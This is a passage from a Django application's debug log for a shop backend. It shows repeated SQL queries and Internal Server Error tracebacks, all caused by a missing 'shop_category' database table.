"/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:53:27] "GET / HTTP/1.0" 500 198328 DEBUG 2019-11-28 13:53:39,388 utils 18022 140356174259968 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T13:53:39.375022+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 28, 13, 53, 39, 375022, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-28 13:53:39,397 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:53:39,443 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:53:39,445 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,446 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,448 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,450 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,451 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,453 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,454 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,456 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,459 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,460 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,462 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,464 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,466 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,468 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,470 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,471 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,473 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,474 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,476 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:53:39,477 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:53:39] "GET / HTTP/1.0" 500 198392 DEBUG 2019-11-28 13:54:02,640 utils 18022 140356174259968 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T13:54:02.630598+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 13, 54, 2, 630598, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 13:54:02,648 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:54:02,676 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:54:02,677 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,678 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,679 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,679 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,680 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,681 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,682 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,683 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,684 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,685 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,686 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,687 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,688 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,689 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,690 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,691 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,692 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,693 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,694 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:02,694 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 18, in product_list 'products': products}) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 36, in render content = loader.render_to_string(template_name, context, request, using=using) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader.py", line 62, in render_to_string return template.render(context, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/backends/django.py", line 61, in render return self.template.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 171, in render return self._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 150, in render return compiled_parent._render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 163, in _render return self.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/loader_tags.py", line 62, in render result = block.nodelist.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 937, in render bit = node.render_annotated(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/base.py", line 904, in render_annotated return self.render(context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/template/defaulttags.py", line 166, in render len_values = len(values) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [28/Nov/2019 13:54:02] "GET / HTTP/1.0" 500 198397 DEBUG 2019-11-28 13:54:26,375 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC; args=() DEBUG 2019-11-28 13:54:26,412 utils 18022 140356174259968 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-28 13:54:26,413 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,416 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,418 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,419 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,420 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,421 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,422 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,423 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,426 utils 18022 140356174259968 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,427 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,428 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,430 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,431 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,432 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,433 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,434 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,436 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,437 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,438 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-28 13:54:26,439 utils 18022 140356174259968 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() Internal Server Error: / Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response 